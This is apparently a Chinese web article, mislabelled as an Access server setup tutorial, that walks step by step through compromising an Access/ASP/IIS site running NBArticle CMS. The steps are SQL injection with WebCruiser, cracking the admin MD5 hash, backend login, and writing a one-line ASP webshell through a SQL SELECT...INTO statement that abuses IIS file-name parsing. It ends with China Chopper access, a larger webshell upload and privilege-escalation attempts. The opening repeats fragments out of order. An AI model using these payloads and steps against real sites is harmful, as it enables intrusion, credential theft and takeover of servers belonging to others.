access服务器架设教程(Access注入获取Webshell)
access服务器架设教程(Access注入获取Webshell)(3)备份数据库。在存在输入的页面加入一句话木马,然后将数据库备份为asa或者asp的文件。 (2)存在上传地址,但无法直接上传Webshell,可以尝试通过IIS解析漏洞等方法来绕过对文件后缀名的验证。 2.SQL注入点处理思路 对于Access数据库 ASP网站存在的SQL注入点的一般处理思路主要有下面五个途径: (1)查看是否有直接可以上传Webshell的地方。如果存在则可以直接上传Webshell来获得Webshell控制权限。
Access asp IIS架构是最早的一种网站架构,主要用在公司站点或者小规模公司,对于这种架构网站的漏洞主要有SQL注入、文件目录信息泄露、文件上传、数据库下载以及弱口令等,其主要威胁来自于SQL注入,虽然目前Asp站点相对较少,但其是网络攻防体系中不可缺少的一部分。
1.1.1Access网站后台加密以及注入处理思路
1. Access Asp IIS架构后台加密算法
对于Access Asp IIS架构最常见的是md5 16位或者32位加密,有安全意识的站点会采用md5(password salt)类似变异加密算法,其中最常见的就是通过自定义salt为一个强健的字符串,使得即使弱口令 salt的md5加密通过cmd5.com网站无法进行暴力破解。
2.SQL注入点处理思路
对于Access数据库 ASP网站存在的SQL注入点的一般处理思路主要有下面五个途径:
(1)查看是否有直接可以上传Webshell的地方。如果存在则可以直接上传Webshell来获得Webshell控制权限。
(2)存在上传地址,但无法直接上传Webshell,可以尝试通过IIS解析漏洞等方法来绕过对文件后缀名的验证。
(3)备份数据库。在存在输入的页面加入一句话木马,然后将数据库备份为asa或者asp的文件。
图1 扫描漏洞
2.SQL注入测试
在进行SQL注入测试前,需要更多的收集目标所使用系统的信息,通过探测和查看网页源代码,获知该系统使用NBArticle,通过网上下载了NBArticle的两个版本,对其数据库进行了分析和研究,该CMS系统管理员表名为NB_Master,将该表名和表字段添加到WebCruiser的系统设置中。
在漏洞扫描中选中存在SQL注入点的记录,然后进行SQL注入测试, SQL注入测试跟其它的SQL注入测试步骤相同,先猜测数据库,然后猜测表,再猜测表列名,最后猜测数据。如图2所示,直接获取了数据库中管理员的密码。
技巧:
(1)由于已经知道该系统采用Access,因此在SQL注入测试时,Databases直接选择Access。
(2)在扫描出漏洞后,可以先在浏览器中进行sql注入测试,判断数据库类型。虽然WebCruiser可以自动扫描出数据库的类型,但效果不是特别好,软件有时候会长时间没有反应。
图2 获取数据
3.进入后台
获取的密码值为16位的Cmd5加密值,将该值放入cmd5.com和xmd5.com进行破解,密码设置不是很复杂,免费就能查到。NBArticle的后台地址为http://www.xxx.org/manger/index.html,打开后台地址后输入管理员账号和密码,成功进入后台,如图3所示,虽然成功进入后台,但该管理界面中未提供上传功能,目标网站对代码进行过修改,有些功能都不能使用。
图3 进入后台
4.获取Webshell
在后台中虽然有数据库备份,但无法获取数据库的真实地址,因此无法进行备份。也就无法通过一句话木马进行数据库备份。但在高级管理中提供了SQL语句直接执行功能,如果知道网站的真实路径,那么可以通过执行SQL语句直接生成一句话密码。通过分析发现,后台首页提供了服务器信息,如图4所示,直接获取了网站后台的真实地址。
图4 获取网站真实路径
5.导入shell到网站根目录
如图5所示,在SQL语句中输入“SELECT '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls' 'excel 8.0;' from NB_Master”然后执行即可获得一句话后门。注意NB_Mater是CMS系统真实存在的表,否则无法执行成功。使用中国菜刀进行一句话木马测试,如图6所示,成功获得该网站的Webshell权限。
图5 执行SQL语句获取Webshell
图6 获取Webshell
6.上传大马进行控制
在中国菜刀中直接上传一个aspnet的Webshell,运行后如图7所示,通过该Webshell来查看数据库以及系统配置等信息。
图7进一步收集信息
由于该网站的权限配置很严格,通过多种提权工具和方法未能获得系统管理员权限,只能放弃。
